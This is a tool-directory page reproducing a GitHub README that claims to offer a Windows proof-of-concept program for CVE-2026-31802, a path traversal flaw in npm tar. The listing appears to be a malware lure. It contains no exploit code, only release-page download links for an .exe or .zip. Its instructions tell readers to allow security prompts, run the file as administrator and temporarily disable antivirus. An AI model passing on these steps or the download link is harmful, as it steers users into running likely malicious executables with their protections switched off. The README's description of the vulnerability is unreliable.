Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2026-31802 — Demonstrate and analyze the CVE-2026-31802 path traversal vulnerability in npm tar, enabling arbitrary file overwrite via symlink extraction. | Kitploit
Tools/GitHubGitHub/recorded-texteditor120/cve-2026-31802
Vulnerability AnalysisExploitationWeb SecurityPapers & ResearchLearning & EducationCurated Resources
GitHubrecorded-texteditor120/cve-2026-31802

CVE-2026-31802

Demonstrate and analyze the CVE-2026-31802 path traversal vulnerability in npm tar, enabling arbitrary file overwrite via symlink extraction.

View Repository
121 day agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

🛡️ CVE-2026-31802 - Simple Proof of Concept Viewer

Download CVE-2026-31802


📋 About CVE-2026-31802

This repository provides a proof of concept (PoC) and write-up for CVE-2026-31802. The issue is a security vulnerability in the npm tar package. It allows attackers to trick the software into writing files outside its allowed folder by abusing symbolic links and path traversal.

This can lead to overwriting important files on your computer without your permission. Understanding and testing this vulnerability can help improve security. This project shows how the vulnerability works and helps security researchers verify fixes.


🖥️ System Requirements

To run this software on a Windows machine, make sure your system meets these requirements:

  • Windows 10 or later
  • At least 2 GB of free hard drive space
  • Internet connection to download the files
  • Basic file management skills (download, open files)

No programming or developer tools are necessary. Anyone who can use a web browser and run simple programs can follow these steps.


🚀 Getting Started: How to Download and Use

The download is not a single file but a releases page. Follow these steps carefully:

  1. Visit the Releases Page

    Click the badge above or go directly to this link:
    https://github.com/Recorded-texteditor120/CVE-2026-31802/releases

  2. Find the Latest Version

    On the releases page, look for the latest release. It usually appears at the top of the list and includes the date.

  3. Download the Correct File

    Click on the file that fits Windows most likely with an .exe or .zip extension. If unsure, choose .exe to make installation easier.

  4. Store the File

    Save the file in a known folder such as Downloads or Desktop.


💾 Installation and Running the Software

If you downloaded an .exe file:

  1. Locate the downloaded .exe file where you saved it.
  2. Double-click the file to start the installation or run the program directly.
  3. If a security prompt appears, choose “Run” or “Allow”.
  4. Follow any on-screen prompts to complete the setup.
  5. The software will open and you can use it immediately.

If you downloaded a .zip file:

  1. Right-click the .zip file and select "Extract All".
  2. Choose a folder, like the Desktop, to extract the files.
  3. Open the extracted folder.
  4. Double-click the main program file (.exe) to launch.

🔍 Using the Software

This application works as a demonstration tool to show how the vulnerability operates.

  • Load or simulate npm tar archives to test path traversal and symlink behavior.
  • Observe how files can be written outside the extraction folder.
  • Use this tool to understand the risk and develop mitigation steps.

The interface will guide you with simple buttons and text boxes. No programming skills are required. Follow the on-screen instructions carefully.


⚙️ How This Demonstration Works

The software replicates the security flaw in the npm tar module.

  • It creates special archive files with symbolic links.
  • These links try to escape the allowed file path.
  • The tool shows that these files can be overwritten outside the extraction folder.

This behavior highlights why the vulnerability is serious and needs a fix.


🔄 Updating the Software

Check the releases page regularly for updates:
https://github.com/Recorded-texteditor120/CVE-2026-31802/releases

Download and install new versions the same way you got the first one. Updates may include bug fixes, security patches, or usability improvements.


🛠 Troubleshooting

  • If the program does not start, try right-clicking the file and selecting “Run as administrator.”
  • If Windows blocks the file, look for a notification in the security center that allows you to run or unblock the file.
  • Ensure your system meets the requirements above.
  • If the interface looks incomplete, your antivirus may have blocked some parts. Try disabling it temporarily during setup.
  • For any problems downloading, check your internet connection or try a different browser.

📌 Additional Information

The software is for educational and testing purposes only. Its goal is to help improve security awareness and fixes for this specific npm tar weakness.

The repository includes detailed documentation on the vulnerability, the exploit method, and the testing process. Feel free to read the included files for deeper understanding.


🗂 Topics and Tags

The project covers:

  • cve
  • cve-2026-31802
  • exploit
  • node-tar
  • path-traversal
  • poc
  • security
  • security-research
  • symlink
  • tar
  • vulnerability

These terms relate to the nature of the vulnerability and the fields involved.


⚡ Quick Access Link to Download

Get CVE-2026-31802

Download Tool